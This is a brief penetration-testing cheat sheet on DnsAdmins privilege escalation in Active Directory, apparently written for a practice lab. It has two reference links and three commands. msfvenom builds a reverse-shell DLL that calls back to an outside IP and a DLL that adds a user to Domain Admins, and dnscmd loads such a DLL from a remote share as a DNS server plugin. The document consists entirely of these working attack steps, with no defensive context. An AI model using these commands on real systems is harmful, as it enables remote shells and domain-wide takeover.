DnsAdmin PrivEsc
https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2
https://github.com/dim0x69/dns-exe-persistance
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f dll > privesc.dll
msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' -f dll -o adduser.dll
dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.94\share\adduser.dll